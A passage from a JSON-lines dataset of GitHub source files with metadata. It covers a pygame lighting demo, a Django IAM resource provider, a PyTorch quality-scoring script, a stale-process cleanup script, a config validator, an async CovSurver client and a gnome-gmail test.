#Fluffy Potatoe version: ############################################\n # screen.blit(c, r.topleft, special_flags=pygame.BLEND_RGB_ADD)\n #Thorpy version: ####################################################\n light = surfaces_light[int(radius)]\n rlight = light.get_rect()\n rlight.center = r.center\n screen.blit(light, rlight.topleft)\n\ndef generate_and_update_particles():\n #generate new particles\n particles.append([list(pygame.mouse.get_pos()), #pos\n [1.3*(random.random()*2 - 1), -4], #vel\n random.randint(MAX_RADIUS//2, MAX_RADIUS)]) #radius\n #update particles\n for particle in particles:\n particle[0][0] += particle[1][0] #update x\n particle[0][1] += particle[1][1] #update y\n particle[2] -= RADIUS_DECAY #reduce radius as time goes by\n particle[1][1] += 0.1 #gravity (update vy)\n draw_light_particle(particle)\n if particle[2] <= 0: #remove particle with negative or zero size\n particles.remove(particle)\n\n#put lights in cache (can take some time)\nsurfaces_light = []\nfor i in range(N+1):\n img = circle_transp_bck(i, LIGHT_COLOR)\n img_light = gen_lights(img,\n n=1, #number of frames\n inflation=0,\n radius_amplitude=3,\n alpha_factor_base=0.9*i/N + 0.1,\n alpha_factor_amplitude=0.,\n color=(255,255,255)\n )[0]\n surfaces_light.append(img_light)\n\n\n\nparticles = []\nclock = pygame.time.Clock()\nplaying = True\nwhile playing:\n screen.blit(bck, (0,0))\n generate_and_update_particles()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playing = False\n ... #your stuff goes here\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()\n", "repo_name": "YannThorimbert/Thorpy2", "sub_path": "examples/_example_fx_lights.py", "file_name": "_example_fx_lights.py", "file_ext": "py", "file_size_in_byte": 3162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "thorpy.fn", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.transform.smoothscale", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 51, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 52, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 53, "usage_type": "call"}, {"api_name": "thorpy.graphics.generate_oscillating_lights", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "26525273517", "text": "from django.core.cache import cache\nfrom django.db.models import Q\n\nfrom gcloud.iam_auth.conf import SEARCH_INSTANCE_CACHE_TIME\nfrom iam import PathEqDjangoQuerySetConverter\nfrom iam.contrib.django.dispatcher import InvalidPageException\nfrom iam.resource.provider import ListResult, ResourceProvider\n\nfrom gcloud.contrib.appmaker.models import AppMaker\nfrom gcloud.core.models import Project\n\n\ndef mini_app_path_value_hook(value):\n # get id in \"/project,id/\"\n return value[1:-1].split(\",\")[1]\n\n\nclass MiniAppResourceProvider(ResourceProvider):\n def pre_search_instance(self, filter, page, **options):\n if page.limit == 0 or page.limit > 1000:\n raise InvalidPageException(\"limit in page too large\")\n\n def search_instance(self, filter, page, **options):\n \"\"\"\n mini app search instance\n \"\"\"\n keyword = filter.keyword\n cache_keyword = \"iam_search_instance_mini_app_{}\".format(keyword)\n project_id = filter.parent[\"id\"] if filter.parent else None\n\n results = cache.get(cache_keyword)\n if results is None:\n queryset = AppMaker.objects.filter(name__icontains=keyword, is_deleted=False).only(\"name\")\n if project_id:\n queryset = queryset.filter(project__id=project_id)\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name}\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n cache.set(cache_keyword, results, SEARCH_INSTANCE_CACHE_TIME)\n return ListResult(results=results, count=len(results))\n\n def list_attr(self, **options):\n \"\"\"\n mini_app 不包含属性\n \"\"\"\n return ListResult(results=[], count=0)\n\n def list_attr_value(self, filter, page, **options):\n \"\"\"\n mini_app 不包含属性\n \"\"\"\n\n return ListResult(results=[], count=0)\n\n def list_instance(self, filter, page, **options):\n \"\"\"\n mini_app 上层资源为 project\n \"\"\"\n queryset = []\n with_path = False\n\n if not (filter.parent or filter.search or filter.resource_type_chain):\n queryset = AppMaker.objects.filter(is_deleted=False)\n elif filter.parent:\n parent_id = filter.parent[\"id\"]\n if parent_id:\n queryset = AppMaker.objects.filter(project_id=str(parent_id), is_deleted=False)\n else:\n queryset = AppMaker.objects.filter(is_deleted=False)\n elif filter.search and filter.resource_type_chain:\n # 返回结果需要带上资源拓扑路径信息\n with_path = True\n # 过滤 project mini_app 名称\n project_keywords = filter.search.get(\"project\", [])\n mini_app_keywords = filter.search.get(\"mini_app\", [])\n\n project_filter = Q()\n mini_app_filter = Q(is_deleted=False)\n\n for keyword in project_keywords:\n project_filter |= Q(name__icontains=keyword)\n\n for keyword in mini_app_keywords:\n mini_app_filter |= Q(name__icontains=keyword)\n\n project_ids = Project.objects.filter(project_filter).values_list(\"id\", flat=True)\n queryset = AppMaker.objects.filter(project_id__in=list(project_ids)).filter(mini_app_filter)\n\n count = queryset.count()\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name}\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n\n if with_path:\n results = [\n {\n \"id\": str(mini_app.id),\n \"display_name\": mini_app.name,\n \"path\": [\n [{\"type\": \"project\", \"id\": str(mini_app.project_id), \"display_name\": mini_app.project.name}]\n ],\n }\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n\n return ListResult(results=results, count=count)\n\n def fetch_instance_info(self, filter, **options):\n \"\"\"\n mini_app 没有定义属性,只处理 filter 中的 ids 字段\n \"\"\"\n ids = []\n if filter.ids:\n ids = [int(i) for i in filter.ids]\n\n queryset = AppMaker.objects.filter(id__in=ids)\n count = queryset.count()\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name, \"_bk_iam_approver_\": mini_app.creator}\n for mini_app in queryset\n ]\n return ListResult(results=results, count=count)\n\n def list_instance_by_policy(self, filter, page, **options):\n \"\"\"\n mini_app\n \"\"\"\n\n expression = filter.expression\n if not expression:\n return ListResult(results=[], count=0)\n\n key_mapping = {\n \"mini_app.id\": \"id\",\n \"mini_app.owner\": \"creator\",\n \"mini_app._bk_iam_path_\": \"project__id\",\n } # TODO 优化\n converter = PathEqDjangoQuerySetConverter(key_mapping, {\"project__id\": mini_app_path_value_hook})\n filters = converter.convert(expression)\n queryset = AppMaker.objects.filter(filters)\n count = queryset.count()\n\n results = [\n {\"id\": str(mini_app.id), \"display_name\": mini_app.name}\n for mini_app in queryset[page.slice_from : page.slice_to]\n ]\n\n return ListResult(results=results, count=count)\n", "repo_name": "TencentBlueKing/bk-sops", "sub_path": "gcloud/iam_auth/resource_api/mini_app.py", "file_name": "mini_app.py", "file_ext": "py", "file_size_in_byte": 5446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1001, "dataset": "github-code", "pt": "53", "api": [{"api_name": "iam.resource.provider.ResourceProvider", "line_number": 18, "usage_type": "name"}, {"api_name": "iam.contrib.django.dispatcher.InvalidPageException", "line_number": 21, "usage_type": "call"}, {"api_name": "django.core.cache.cache.get", "line_number": 31, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 31, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 33, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 33, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 40, "usage_type": "call"}, {"api_name": "gcloud.iam_auth.conf.SEARCH_INSTANCE_CACHE_TIME", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.core.cache.cache", "line_number": 40, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 41, "usage_type": "call"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 47, "usage_type": "call"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 54, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 64, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 68, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 68, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 78, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 79, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 82, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 85, "usage_type": "call"}, {"api_name": "gcloud.core.models.Project.objects.filter", "line_number": 87, "usage_type": "call"}, {"api_name": "gcloud.core.models.Project.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Project", "line_number": 87, "usage_type": "name"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 88, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 88, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 108, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 118, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 118, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 124, "usage_type": "call"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 133, "usage_type": "call"}, {"api_name": "iam.PathEqDjangoQuerySetConverter", "line_number": 140, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects.filter", "line_number": 142, "usage_type": "call"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker.objects", "line_number": 142, "usage_type": "attribute"}, {"api_name": "gcloud.contrib.appmaker.models.AppMaker", "line_number": 142, "usage_type": "name"}, {"api_name": "iam.resource.provider.ListResult", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "1187235577", "text": "def test_qa(io_dir, device='0'):\n \n import os\n from io_functions import read_img_as_tensor\n from torch.autograd import Variable\n from scipy.io import savemat\n import torch\n from glob import glob\n from tqdm import tqdm\n \n cuda1 = torch.device('cuda:' + device)\n \n enh_dir = io_dir + 'img_data/train_unlbld/restored_with_ensemble/'\n long_dir = io_dir + 'img_data/train_lbld/long_lp/'\n \n pred_qlty_dir = io_dir + 'img_data/train_unlbld/pred_qlty_mv/'\n model_dir = io_dir + 'checkpoints/qa_model_mv/modelq.pth'\n\n if not os.path.exists(pred_qlty_dir):\n os.mkdir(pred_qlty_dir)\n \n enh_files = glob(enh_dir + '*.png')\n long_files = os.listdir(long_dir)\n \n model = torch.load(model_dir)\n model = model.eval()\n model = model.cuda(cuda1)\n \n #################### computing long_features ###########################\n sum_long_features = torch.zeros((1,128), device=cuda1, dtype=torch.float32)\n for name in tqdm(long_files):\n\n im_long = read_img_as_tensor(long_dir + name, device)\n \n with torch.no_grad():\n long_features = model(im_long)\n \n sum_long_features += long_features\n \n sum_long_features = sum_long_features/len(long_files)\n sum_long_features = sum_long_features/torch.norm(sum_long_features)\n \n #################### computing similarity of short_features with long_features ###########################\n for path in tqdm(enh_files):\n \n name = os.path.basename(path)\n \n im_enh = read_img_as_tensor(enh_dir + name, device)\n \n with torch.no_grad():\n enh_features = model(im_enh)\n \n enh_features = enh_features/torch.norm(enh_features)\n \n pred_qlty = torch.matmul(enh_features, sum_long_features.t())\n pred_qlty = Variable(pred_qlty, requires_grad=False).cpu().numpy()\n pred_qlty_dict = {'pred_qlty':pred_qlty}\n savemat(pred_qlty_dir + name[:-4] + '.mat', pred_qlty_dict) ", "repo_name": "sameerIISc/SSL-LLR", "sub_path": "qa_codes/test_qa.py", "file_name": "test_qa.py", "file_ext": "py", "file_size_in_byte": 2019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 20, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 31, "usage_type": "call"}, {"api_name": "io_functions.read_img_as_tensor", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 41, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "io_functions.read_img_as_tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.io.savemat", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "590563877", "text": "#!/usr/bin/python3\n# coding: utf-8\n\n\"\"\"\n author: 猪猪侠 https://github.com/ring04h\n\n\"\"\"\n\nimport logging\nimport subprocess\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# \n# (crontab -l;echo '0 2 * * * /usr/local/bin/python3 /data/script/zombie_clean.py') | crontab -\n# \n\ndef is_timeout(etime):\n if '-' in etime:\n day, hour = etime.split('-')\n return True if int(day) >= 1 else False\n else:\n return False\n\n\ndef cmdprocess(cmdline):\n\n pipe = subprocess.Popen(cmdline, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output, stderr = pipe.communicate()\n return_code = pipe.returncode\n stderr = stderr.decode(errors='replace')\n output = output.decode(errors='replace')\n return output, stderr, return_code\n\n\n\ndef main():\n\n cmdline = \"ps -ef | grep crawlergo | grep -v grep | awk '{print $2}'\"\n output, stderr, return_code = cmdprocess(cmdline)\n \n if return_code != 0:\n return\n\n zombie_pids = output.splitlines()\n\n for zombie_pid in zombie_pids:\n\n cmdline = f'''ps -eo pid,etime | grep {zombie_pid}'''\n ps_output, ps_stderr, ps_return_code = cmdprocess(cmdline)\n\n if ps_return_code != 0:\n continue\n\n for line in ps_output.splitlines():\n \n pid, etime = line.split()\n\n status = is_timeout(etime)\n logging.debug(f\"PID: {pid:<8} ETIME: {etime:<15} TIMEOUT: {status}\")\n\n if not status: \n continue\n\n kill_cmdline = f\"kill -9 {pid}\"\n logging.debug(f\"call kill : [{kill_cmdline}]\")\n\n cmdprocess(kill_cmdline)\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "Qianlitp/crawlergo", "sub_path": "examples/zombie_clean.py", "file_name": "zombie_clean.py", "file_ext": "py", "file_size_in_byte": 1663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2635, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 28, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "35751115513", "text": "\"\"\"\nValidates service configuration based on jsonschema for any Tapis flask API. The base schema for all services is\nconfigschema.json, in this repo, but services can update or override the schema definition with\n\n\"\"\"\nimport json\nimport jsonschema\nimport os\nimport re\n\nfrom tapisservice.errors import BaseTapisError\n\nHERE = os.path.dirname(os.path.abspath(__file__))\n\n# load the base api schema -\nschema = json.load(open(os.path.join(HERE, 'configschema.json'), 'r'))\n\n# try to load an api-specific schema\nservice_configschema_path = os.environ.get('TAPIS_CONFIGSCHEMA_PATH', '/home/tapis/configschema.json')\ntry:\n api_schema = json.load(open(service_configschema_path, 'r'))\nexcept Exception as e:\n # at this point, logging is not set up yet, so we just print the message to the screen and hope for the best:\n msg = f'ERROR, improperly configured service. Could not load configschema.json found; ' \\\n f'looked in {service_configschema_path}. Aborting. Exception: {e}'\n print(msg)\n raise BaseTapisError(msg)\n\n# ----- Combine the service config schema with the base config schema -----\n# In what follows, we take a manual approach, but instead we could also have the service schema use the allOf\n# feature to pull in the base schema; cf., https://github.com/json-schema-org/json-schema-spec/issues/348\n# The downside with that would be that it is up to each service to include the base schema properly.\n\n# 1) we override properties defined in the base schema with properties defined in the service schema\napi_properties = api_schema.get('properties')\nif api_properties and type(api_properties) == dict:\n schema['properties'].update(api_properties)\n\n# 2) we extend the required properties with those specified as required by the API -\napi_required = api_schema.get('required')\nif api_required and type(api_required) == list:\n schema['required'].extend(api_required)\n\n\n# extend the default jsonschema validator to supply/modify the instance with default values supplied in the\n# schema definition. very surprising that this is not the default behavior;\n# see: https://python-jsonschema.readthedocs.io/en/stable/faq/\ndef extend_with_default(validator_class):\n validate_properties = validator_class.VALIDATORS[\"properties\"]\n\n def set_defaults(validator, properties, instance, schema):\n for property, subschema in properties.items():\n default_set = False\n # add support for environment variables for type string variables\n if subschema[\"type\"] == \"string\":\n # environment variables override any default set in the jsonschema\n if os.environ.get(property):\n default_set = True\n instance.setdefault(property, os.environ.get(property))\n # check for a default supplied in the jsonschem doc\n if \"default\" in subschema and not default_set:\n instance.setdefault(property, subschema[\"default\"])\n\n for error in validate_properties(\n validator, properties, instance, schema,\n ):\n yield error\n\n return jsonschema.validators.extend(\n validator_class, {\"properties\": set_defaults},\n )\n\n\nDefaultValidatingDraft7Validator = extend_with_default(jsonschema.Draft7Validator)\n\n\ndef match_and_replace_env_variables(txt_to_match: str) -> str:\n \"\"\"\n A function to look through a str for any instances of '$env{ * }. If an instance is located\n the interior of the braces is compared to existing environment variables. If the variable exists\n it is then subbed into the text allow users to substitute environment variables directly into\n their configs.\n \"\"\"\n environ_regex_pattern = re.compile(r'\\$env\\{(.*?)\\}')\n pattern_matches = environ_regex_pattern.findall(txt_to_match)\n for matched_var in pattern_matches:\n if os.environ.get(matched_var):\n txt_to_match = txt_to_match.replace(f\"$env{{{matched_var}}}\", os.environ.get(matched_var))\n return txt_to_match\n\n\n# now that we have the required API config schema, we need to validate it against the actual configs supplied\n# to the service.\n\nclass Config(dict):\n \"\"\"\n A class containing an API service's config, as a Python dictionary, with getattr and setattr defined to make\n attribute access work like a \"normal\" object. One should import the singleton Conf directly from this module.\n\n Example usage:\n ~~~~~~~~~~~~~~\n from config import conf <-- all service configs loaded and validated against the\n conf.some_key <-- AttributeError raised if some_key (optional) config not defined\n \"\"\"\n\n def __getattr__(self, key):\n # returning an AttributeError is important for making deepcopy work. cf.,\n # http://stackoverflow.com/questions/25977996/supporting-the-deep-copy-operation-on-a-custom-class\n try:\n return self[key]\n except KeyError as e:\n raise AttributeError(e)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n @classmethod\n def get_config_from_file(self):\n \"\"\"\n Reads service config from a JSON file\n :return:\n \"\"\"\n path = os.environ.get('TAPIS_CONFIG_PATH', '/home/tapis/config.json')\n if os.path.exists(path):\n try:\n with open(path, 'r') as config_raw:\n config_txt = config_raw.read()\n config_with_env = match_and_replace_env_variables(config_txt)\n return json.loads(config_with_env)\n except Exception as e:\n msg = f'Could not load configs from JSON file at: {path}. exception: {e}'\n print(msg)\n raise BaseTapisError(msg)\n\n @classmethod\n def load_config(cls):\n \"\"\"\n Load the config from various places, including a JSON file and environment variables.\n :return:\n \"\"\"\n file_config = cls.get_config_from_file()\n # validate config against schema definition\n try:\n # jsonschema.validate(instance=file_config, schema=schema)\n DefaultValidatingDraft7Validator(schema).validate(file_config)\n except jsonschema.SchemaError as e:\n msg = f'Invalid service config: exception: {e}'\n print(msg)\n raise BaseTapisError(msg)\n return file_config\n\n\nconf = Config(Config.load_config())", "repo_name": "tapis-project/tapipy-tapisservice", "sub_path": "tapisservice/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 6379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 21, "usage_type": "call"}, {"api_name": "tapisservice.errors.BaseTapisError", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 57, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 59, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 59, "usage_type": "attribute"}, {"api_name": "jsonschema.validators.extend", "line_number": 69, "usage_type": "call"}, {"api_name": "jsonschema.validators", "line_number": 69, "usage_type": "attribute"}, {"api_name": "jsonschema.Draft7Validator", "line_number": 74, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 84, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 87, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 88, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 123, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 129, "usage_type": "call"}, {"api_name": "tapisservice.errors.BaseTapisError", "line_number": 133, "usage_type": "call"}, {"api_name": "jsonschema.SchemaError", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tapisservice.errors.BaseTapisError", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "40979824469", "text": "import io\nimport logging\nimport re\nfrom typing import Optional, TextIO\n\nimport aiohttp\n\nlogger = logging.getLogger(\"covsurver-client\")\n\nCOVSURVER_BASE_LINK = \"https://mendel3.bii.a-star.edu.sg/METHODS/corona/delta6\"\nCOVSURVER_REQUEST_LINK = COVSURVER_BASE_LINK + \"/cgi-bin/coronamapBlastAnno.pl\"\n\n\nasync def fetch_covsurver_report(fasta: str | TextIO) -> Optional[str]:\n \"\"\"Fetch CovSurver report for a given fasta. Raw result contains tsv as string.\n\n Parameters\n ----------\n fasta : str | TextIO\n fasta with sequences\n\n Returns\n -------\n Optional[str]\n CovSurver report as tsv string\n \"\"\"\n\n stream = io.StringIO(fasta) if isinstance(fasta, str) else fasta\n\n async with aiohttp.ClientSession() as session:\n logger.debug(\"POST request to: %s\", COVSURVER_REQUEST_LINK)\n\n async with session.post(\n COVSURVER_REQUEST_LINK, data={\"seqfile\": stream}\n ) as response:\n response_text = await response.text()\n if not response.ok:\n logger.error(\n \"POST response status: %s, body: %s\",\n response.status,\n response_text,\n )\n return\n else:\n logger.debug(\"POST response status: %s\", response.status)\n\n result_link_search = re.search(\n r\"/mendeltemp/covsurver_result\\d+_perquery.tsv\", response_text\n )\n if not result_link_search:\n logger.error(\n \"No result link in response, response body: %s\", response_text\n )\n return\n\n result_link = COVSURVER_BASE_LINK + result_link_search.group(0)\n\n logger.debug(\"GET request to: %s\", result_link)\n async with session.get(result_link) as response:\n if not response.ok:\n logger.error(\"GET response status: %s\", response.status)\n return\n else:\n logger.debug(\"GET response status: %s\", response.status)\n\n covsurver_report = await response.text()\n\n return covsurver_report\n", "repo_name": "kirill-varchenko/covsurver-client", "sub_path": "covsurver_client/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 2132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "typing.TextIO", "line_number": 14, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 28, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 30, "usage_type": "call"}, {"api_name": "re.search", "line_number": 47, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "72964600809", "text": "# -*- coding: utf-8 -*-\n\nimport pytest\n\nfrom six.moves import urllib\n\nimport gnomegmail\n\nbase_mail_dict = {\n 'to': \"to@exämple.com\",\n 'from': \"from@exämple.com\",\n}\n\n\n@pytest.mark.parametrize(\"body\", (\n \"\",\n \"simple body\",\n \"body with http://example.com/link\",\n))\n@pytest.mark.parametrize(\"attach\", (False, True))\n@pytest.mark.parametrize(\"cc\", ([], [\"cc@example.com\"]))\n@pytest.mark.parametrize(\"bcc\", ([], [\"bcc@example.com\"]))\n@pytest.mark.parametrize(\"su\", ([], [\"subject\"]))\ndef test_gmailapi(web_fxt, tmpfile, su, bcc, cc, attach, body):\n mail_dict = base_mail_dict.copy()\n\n if body:\n mail_dict['body'] = body\n\n if attach:\n mail_dict['attach'] = [urllib.request.pathname2url(tmpfile)]\n\n if cc:\n mail_dict['cc'] = cc\n\n if bcc:\n mail_dict['bcc'] = bcc\n\n if su:\n mail_dict['su'] = su\n\n gmailapi = gnomegmail.GMailAPI(mail_dict)\n gmailapi.form_message()\n id = gmailapi.upload_mail('user', 'atoken')\n\n assert id == '1'\n", "repo_name": "davesteele/gnome-gmail", "sub_path": "test/test_gmailapi.py", "file_name": "test_gmailapi.py", "file_ext": "py", "file_size_in_byte": 1001, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 48, "dataset": "github-code", "pt": "53", "api": [{"api_name": "six.moves.urllib.request.pathname2url", "line_number": 31, "usage_type": "call"}, {"api_name": "six.moves.urllib.request", "line_number": 31, "usage_type": "attribute"}, {"api_name": "six.moves.urllib", "line_number": 31, "usage_type": "name"}, {"api_name": "gnomegmail.GMailAPI", "line_number": 42, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 15, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 21, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "38124905955", "text": "import torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nimport torch\nimport numpy as np\nimport random\nfrom torchvision.datasets import MNIST\nfrom efficientnet_pytorch import EfficientNet\nfrom torch.nn.modules.distance import PairwiseDistance\nclass EmbeddingNet(nn.Module):\n def __init__(self,\n backbone = \"our\",\n embedding_size=128):\n super(EmbeddingNet, 